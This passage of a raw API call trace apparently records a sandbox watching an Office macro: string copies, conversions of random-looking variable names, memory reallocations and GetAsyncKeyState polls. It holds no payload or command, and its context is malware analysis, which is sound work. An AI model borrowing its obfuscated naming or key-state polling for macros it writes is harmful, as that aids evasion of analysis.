lpWideCharStr=0x347614, cchWideChar=17 | out: lpWideCharStr="_B_var_cLZUlMQ1") returned 16 [0060.296] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5371cd6 | out: _Dst=0x34767c) returned 0x0 [0060.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371cfe, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="Vr1MH2c") returned 8 [0060.296] CRetailMalloc_Alloc () returned 0x87fc500 [0060.297] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x5371cfe | out: _Dst=0x87fc500) returned 0x0 [0060.297] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20d86, cbMultiByte=15, lpWideCharStr=0x347614, cchWideChar=16 | out: lpWideCharStr="_B_var_Vr1MH2c") returned 15 [0060.297] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x5371cfe | out: _Dst=0x34767c) returned 0x0 [0060.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371d22, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="ZU2EfJx") returned 8 [0060.298] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x5371d22 | out: _Dst=0x87fc500) returned 0x0 [0060.299] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20db2, cbMultiByte=15, lpWideCharStr=0x347614, cchWideChar=16 | out: lpWideCharStr="_B_var_ZU2EfJx") returned 15 [0060.299] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x5371d22 | out: _Dst=0x34767c) returned 0x0 [0060.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371d46, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="B42De7XK") returned 9 [0060.299] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x5371d46 | out: _Dst=0x87fc500) returned 0x0 [0060.300] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20dde, cbMultiByte=16, lpWideCharStr=0x347614, cchWideChar=17 | out: lpWideCharStr="_B_var_B42De7XK") returned 16 [0060.300] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5371d46 | out: _Dst=0x34767c) returned 0x0 [0060.301] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5371d6e | out: _Dst=0x87fc500) returned 0x0 [0060.301] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5371d6e | out: _Dst=0x34767c) returned 0x0 [0060.301] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5371d92 | out: _Dst=0x87504c0) returned 0x0 [0060.301] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5371d92 | out: _Dst=0x34767c) returned 0x0 [0060.301] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5371dba | out: _Dst=0x87fc500) returned 0x0 [0060.302] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5371dba | out: _Dst=0x34767c) returned 0x0 [0060.302] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x5371dde | out: _Dst=0x87fc500) returned 0x0 [0060.302] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5371dde | out: _Dst=0x34767c) returned 0x0 [0060.302] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x5371e2a | out: _Dst=0x87fc500) returned 0x0 [0060.302] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5371e2a | out: _Dst=0x34767c) returned 0x0 [0060.303] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5371e02 | out: _Dst=0x87504c0) returned 0x0 [0060.303] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5371e02 | out: _Dst=0x34767c) returned 0x0 [0060.303] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x5371e4e | out: _Dst=0x87fc500) returned 0x0 [0060.303] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5371e4e | out: _Dst=0x34767c) returned 0x0 [0060.304] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x5371e76 | out: _Dst=0x87fc500) returned 0x0 [0060.304] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x5371e76 | out: _Dst=0x34767c) returned 0x0 [0060.304] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5371ebe | out: _Dst=0x87fc500) returned 0x0 [0060.304] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5371ebe | out: _Dst=0x34767c) returned 0x0 [0060.304] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x5371e9a | out: _Dst=0x87fc500) returned 0x0 [0060.305] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5371e9a | out: _Dst=0x34767c) returned 0x0 [0060.305] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5371ee2 | out: _Dst=0x87fc500) returned 0x0 [0060.305] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5371ee2 | out: _Dst=0x34767c) returned 0x0 [0060.305] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5371f06 | out: _Dst=0x87fc500) returned 0x0 [0060.306] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20ff6, cbMultiByte=13, lpWideCharStr=0x347614, cchWideChar=14 | out: lpWideCharStr="_B_var_R7am6") returned 13 [0060.306] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5371f06 | out: _Dst=0x34767c) returned 0x0 [0060.306] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5371f2a | out: _Dst=0x87fc500) returned 0x0 [0060.306] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5371f2a | out: _Dst=0x34767c) returned 0x0 [0060.307] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5371f4e | out: _Dst=0x87504c0) returned 0x0 [0060.307] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5371f4e | out: _Dst=0x34767c) returned 0x0 [0060.307] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x5371f76 | out: _Dst=0x87fc500) returned 0x0 [0060.307] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5371f76 | out: _Dst=0x34767c) returned 0x0 [0060.307] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5371f9a | out: _Dst=0x87504c0) returned 0x0 [0060.308] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5371f9a | out: _Dst=0x34767c) returned 0x0 [0060.308] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x5371fc2 | out: _Dst=0x87fc500) returned 0x0 [0060.308] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5371fc2 | out: _Dst=0x34767c) returned 0x0 [0060.308] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5371fe6 | out: _Dst=0x87504c0) returned 0x0 [0060.309] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5371fe6 | out: _Dst=0x34767c) returned 0x0 [0060.309] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x537200e | out: _Dst=0x87504c0) returned 0x0 [0060.309] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x537200e | out: _Dst=0x34767c) returned 0x0 [0060.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372036, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="yGp0Jj") returned 7 [0060.310] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x5372036 | out: _Dst=0x87fc500) returned 0x0 [0060.310] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5372036 | out: _Dst=0x34767c) returned 0x0 [0060.310] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x537205a | out: _Dst=0x87fc500) returned 0x0 [0060.310] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x537205a | out: _Dst=0x34767c) returned 0x0 [0060.310] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x537207e | out: _Dst=0x87504c0) returned 0x0 [0060.311] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x537207e | out: _Dst=0x34767c) returned 0x0 [0060.311] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x53720a6 | out: _Dst=0x87fc500) returned 0x0 [0060.311] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x53720a6 | out: _Dst=0x34767c) returned 0x0 [0060.311] CRetailMalloc_Realloc () returned 0x8854168 [0060.311] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x53720ee | out: _Dst=0x87fc500) returned 0x0 [0060.312] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x53720ee | out: _Dst=0x34767c) returned 0x0 [0060.312] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x53720ca | out: _Dst=0x87fc500) returned 0x0 [0060.312] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x53720ca | out: _Dst=0x34767c) returned 0x0 [0060.312] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5372112 | out: _Dst=0x87fc500) returned 0x0 [0060.312] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5372112 | out: _Dst=0x34767c) returned 0x0 [0060.313] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5372136 | out: _Dst=0x87fc500) returned 0x0 [0060.313] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5372136 | out: _Dst=0x34767c) returned 0x0 [0060.313] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x537215a | out: _Dst=0x87fc500) returned 0x0 [0060.313] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x537215a | out: _Dst=0x34767c) returned 0x0 [0060.314] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x537217e | out: _Dst=0x87fc500) returned 0x0 [0060.314] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x537217e | out: _Dst=0x34767c) returned 0x0 [0060.314] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x53721a2 | out: _Dst=0x87fc500) returned 0x0 [0060.314] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x53721a2 | out: _Dst=0x34767c) returned 0x0 [0060.314] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x53721c6 | out: _Dst=0x87fc500) returned 0x0 [0060.315] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x53721c6 | out: _Dst=0x34767c) returned 0x0 [0060.315] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x53721ee | out: _Dst=0x87fc500) returned 0x0 [0060.315] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x53721ee | out: _Dst=0x34767c) returned 0x0 [0060.315] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x5372212 | out: _Dst=0x87fc500) returned 0x0 [0060.316] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x5372212 | out: _Dst=0x34767c) returned 0x0 [0060.316] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x537225e | out: _Dst=0x87fc500) returned 0x0 [0060.316] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x537225e | out: _Dst=0x34767c) returned 0x0 [0060.316] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x5372236 | out: _Dst=0x87fc500) returned 0x0 [0060.316] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5372236 | out: _Dst=0x34767c) returned 0x0 [0060.317] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5372282 | out: _Dst=0x87504c0) returned 0x0 [0060.317] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5372282 | out: _Dst=0x34767c) returned 0x0 [0060.317] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x53722aa | out: _Dst=0x87fc500) returned 0x0 [0060.317] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x53722aa | out: _Dst=0x34767c) returned 0x0 [0060.317] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x53722ce | out: _Dst=0x87fc500) returned 0x0 [0060.318] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x53722ce | out: _Dst=0x34767c) returned 0x0 [0060.318] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5372316 | out: _Dst=0x87fc500) returned 0x0 [0060.318] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5372316 | out: _Dst=0x34767c) returned 0x0 [0060.318] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x53722f2 | out: _Dst=0x87fc500) returned 0x0 [0060.319] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x53722f2 | out: _Dst=0x34767c) returned 0x0 [0060.319] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x537233a | out: _Dst=0x87fc500) returned 0x0 [0060.319] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x537233a | out: _Dst=0x34767c) returned 0x0 [0060.319] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x537235e | out: _Dst=0x87fc500) returned 0x0 [0060.319] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x537235e | out: _Dst=0x34767c) returned 0x0 [0060.320] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5372382 | out: _Dst=0x87504c0) returned 0x0 [0060.320] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5372382 | out: _Dst=0x34767c) returned 0x0 [0060.320] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x53723aa | out: _Dst=0x87fc500) returned 0x0 [0060.320] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x53723aa | out: _Dst=0x34767c) returned 0x0 [0060.320] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x53723d2 | out: _Dst=0x87fc500) returned 0x0 [0060.321] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x53723d2 | out: _Dst=0x34767c) returned 0x0 [0060.321] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x53723f6 | out: _Dst=0x87fc500) returned 0x0 [0060.321] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x53723f6 | out: _Dst=0x34767c) returned 0x0 [0060.321] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x537241a | out: _Dst=0x87fc500) returned 0x0 [0060.322] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x537241a | out: _Dst=0x34767c) returned 0x0 [0060.322] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x537243e | out: _Dst=0x87fc500) returned 0x0 [0060.322] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x537243e | out: _Dst=0x34767c) returned 0x0 [0060.322] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x5372466 | out: _Dst=0x87fc500) returned 0x0 [0060.322] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x5372466 | out: _Dst=0x34767c) returned 0x0 [0060.323] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x537248a | out: _Dst=0x87fc500) returned 0x0 [0060.323] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x537248a | out: _Dst=0x34767c) returned 0x0 [0060.325] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x53724d2 | out: _Dst=0x87fc500) returned 0x0 [0060.325] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x53724d2 | out: _Dst=0x34767c) returned 0x0 [0060.326] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x53724ae | out: _Dst=0x87fc500) returned 0x0 [0060.326] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x53724ae | out: _Dst=0x34767c) returned 0x0 [0060.326] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x53724fa | out: _Dst=0x87504c0) returned 0x0 [0060.326] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x53724fa | out: _Dst=0x34767c) returned 0x0 [0060.327] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x5372522 | out: _Dst=0x87fc500) returned 0x0 [0060.327] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5372522 | out: _Dst=0x34767c) returned 0x0 [0060.327] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x537254a | out: _Dst=0x87fc500) returned 0x0 [0060.327] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x537254a | out: _Dst=0x34767c) returned 0x0 [0060.327] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x537256e | out: _Dst=0x87504c0) returned 0x0 [0060.328] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x537256e | out: _Dst=0x34767c) returned 0x0 [0060.328] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x5372596 | out: _Dst=0x87fc500) returned 0x0 [0060.328] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5372596 | out: _Dst=0x34767c) returned 0x0 [0060.328] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x53725be | out: _Dst=0x87fc500) returned 0x0 [0060.328] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x53725be | out: _Dst=0x34767c) returned 0x0 [0060.329] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x53725e2 | out: _Dst=0x87fc500) returned 0x0 [0060.329] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x53725e2 | out: _Dst=0x34767c) returned 0x0 [0060.329] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5372606 | out: _Dst=0x87504c0) returned 0x0 [0060.329] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5372606 | out: _Dst=0x34767c) returned 0x0 [0060.330] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x537262e | out: _Dst=0x87504c0) returned 0x0 [0060.330] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x537262e | out: _Dst=0x34767c) returned 0x0 [0060.330] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x5372656 | out: _Dst=0x87fc500) returned 0x0 [0060.330] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5372656 | out: _Dst=0x34767c) returned 0x0 [0060.330] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x537267e | out: _Dst=0x87504c0) returned 0x0 [0060.331] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x537267e | out: _Dst=0x34767c) returned 0x0 [0060.331] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x53726ca | out: _Dst=0x87fc500) returned 0x0 [0060.331] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x53726ca | out: _Dst=0x34767c) returned 0x0 [0060.331] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x53726a6 | out: _Dst=0x87fc500) returned 0x0 [0060.332] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x53726a6 | out: _Dst=0x34767c) returned 0x0 [0060.332] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x53726f2 | out: _Dst=0x87fc500) returned 0x0 [0060.332] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x53726f2 | out: _Dst=0x34767c) returned 0x0 [0060.332] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x5372716 | out: _Dst=0x87fc500) returned 0x0 [0060.332] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5372716 | out: _Dst=0x34767c) returned 0x0 [0060.333] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x537273a | out: _Dst=0x87fc500) returned 0x0 [0060.333] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x537273a | out: _Dst=0x34767c) returned 0x0 [0060.333] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x537275e | out: _Dst=0x87fc500) returned 0x0 [0060.333] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x537275e | out: _Dst=0x34767c) returned 0x0 [0060.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5372782, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="F53XA") returned 6 [0060.334] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5372782 | out: _Dst=0x87fc500) returned 0x0 [0060.334] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5372782 | out: _Dst=0x34767c) returned 0x0 [0060.334] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x53727a6 | out: _Dst=0x87504c0) returned 0x0 [0060.334] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x53727a6 | out: _Dst=0x34767c) returned 0x0 [0060.334] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x53727ce | out: _Dst=0x87fc500) returned 0x0 [0060.335] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x53727ce | out: _Dst=0x34767c) returned 0x0 [0060.335] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x53727f2 | out: _Dst=0x87504c0) returned 0x0 [0060.335] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x53727f2 | out: _Dst=0x34767c) returned 0x0 [0060.335] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x537281a | out: _Dst=0x87fc500) returned 0x0 [0060.335] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x537281a | out: _Dst=0x34767c) returned 0x0 [0060.336] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5372862 | out: _Dst=0x87504c0) returned 0x0 [0060.336] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5372862 | out: _Dst=0x34767c) returned 0x0 [0060.336] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x537283e | out: _Dst=0x87fc500) returned 0x0 [0060.336] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x537283e | out: _Dst=0x34767c) returned 0x0 [0060.337] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x537288a | out: _Dst=0x87fc500) returned 0x0 [0060.337] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x537288a | out: _Dst=0x34767c) returned 0x0 [0060.337] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x53728ae | out: _Dst=0x87fc500) returned 0x0 [0060.337] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x53728ae | out: _Dst=0x34767c) returned 0x0 [0060.337] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x53728d2 | out: _Dst=0x87fc500) returned 0x0 [0060.338] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x53728d2 | out: _Dst=0x34767c) returned 0x0 [0060.338] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x53728f6 | out: _Dst=0x87fc500) returned 0x0 [0060.338] CRetailMalloc_Realloc () returned 0x88a9ed8 [0060.340] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x53728f6 | out: _Dst=0x34767c) returned 0x0 [0060.340] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x537291a | out: _Dst=0x87fc500) returned 0x0 [0060.341] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x537291a | out: _Dst=0x34767c) returned 0x0 [0060.341] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5372942 | out: _Dst=0x87fc500) returned 0x0 [0060.341] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5372942 | out: _Dst=0x34767c) returned 0x0 [0060.341] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x5372966 | out: _Dst=0x87fc500) returned 0x0 [0060.342] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x5372966 | out: _Dst=0x34767c) returned 0x0 [0060.342] CRetailMalloc_Realloc () returned 0x888fc70 [0060.342] CRetailMalloc_Realloc () returned 0x888fc70 [0060.342] CRetailMalloc_Realloc () returned 0x88b9ee0 [0060.343] CRetailMalloc_Realloc () returned 0x88b9ee0 [0060.343] CRetailMalloc_Realloc () returned 0x8809d08 [0060.343] CRetailMalloc_Realloc () returned 0x88b9ee0 [0060.343] CRetailMalloc_Realloc () returned 0x88b9ee0 [0060.343] CRetailMalloc_Realloc () returned 0x8858970 [0060.344] CRetailMalloc_Realloc () returned 0x8858970 [0060.344] GetAsyncKeyState (vKey=3) returned 0 [0060.344] GetAsyncKeyState (vKey=3) returned 0 [0060.344] VarCmp (pvarLeft=0x347dec, pvarRight=0x347ddc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.345] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x346480 | out: pbstrResult=0x346480) returned 0x0 [0060.345] VarCmp (pvarLeft=0x347d6c, pvarRight=0x347ddc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.345] VarCmp (pvarLeft=0x347d3c, pvarRight=0x347ddc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.345] VarCmp (pvarLeft=0x347d3c, pvarRight=0x347ddc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0060.345] VarCmp (pvarLeft=0x347cec, 